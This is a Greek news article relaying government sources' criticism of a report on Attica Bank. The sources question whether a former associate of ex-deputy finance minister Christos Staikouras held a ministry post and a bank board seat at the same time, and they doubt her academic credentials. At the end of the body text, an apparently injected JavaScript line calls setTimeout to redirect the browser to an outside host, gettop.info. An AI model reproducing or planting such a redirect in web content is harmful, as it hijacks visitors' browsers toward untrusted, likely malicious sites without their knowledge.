Κυβερνητικές πηγές για Attica Bank: Όσοι κάνουν το άσπρο μαύρο, διαψεύδονται από τις πράξεις τους

0
11

 

Με αφορμή σημερινό δημoσίευμα της «Εφημερίδας των Συντακτών» αναφορικά με την Attica Bak υπό τον τίτλο «Από το Λύκειο στο … μεταπτυχιακό» κυβερνητικές πηγές υποστηρίζουν: «Αυτοί που, τον τελευταίο καιρό, καταβάλλουν μια συστηματική προσπάθεια να κάνουν το «άσπρο μαύρο», διαψεύδονται, με τον πλέον χαρακτηριστικό τρόπο, από τις ίδιες τις πράξεις τους».

Ειδικότερα, αναφέρουν ότι, σύμφωνα με το δημοσίευμα, στενή συνεργάτις του πρώην αναπληρωτή υπουργού Οικονομικών Χρήστου Σταϊκούρα φέρεται να υπηρετούσε παράλληλα, τόσο ως μετακλητή υπάλληλος στο γραφείο του τότε αναπληρωτή υπουργού όσο και ως μέλος του ΔΣ της Attica Bank και στέλεχος της τράπεζας και, μάλιστα, σε θέση αυξημένης ευθύνης.

«Ταυτόχρονα σε ό,τι αφορά την ίδια, εγείρονται ερωτηματικά για την επιστημονική της επάρκεια και, ενδεχομένως, για τη νομιμότητα των τίτλων σπουδών που παρουσιάζει στο βιογραφικό της και βάσει των οποίων πιστοποιήθηκε από την τράπεζα της Ελλάδος και διορίστηκε στην συγκεκριμένη θέση μετακλητής υπαλλήλου», αναφέρουν οι κυβερνητικέ πηγές που επικαλείται το Αθηναϊκό Πρακτορείο.

Και θέτουν το ερώτημα: «Αλήθεια, ο κ. Σταϊκούρας, η τότε διοίκηση της Attica Bank, οι αρμόδιοι φορείς της ΤτΕ, είχαν ελέγξει την πληρότητα και τη νομιμότητα των στοιχείων αυτών; Η μήπως όταν αφορά τα «δικά μας παιδιά», τέτοιες λεπτομέρειες δεν έχουν σημασία;».

Οι πηγές της κυβέρνησης σημειώνουν ότι «αυτοί που, τον τελευταίο καιρό, καταβάλλουν μια συστηματική προσπάθεια να κάνουν το άσπρο μαύρο, διαψεύδονται, με τον πλέον χαρακτηριστικό τρόπο, από τις ίδιες τις πράξεις τους». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here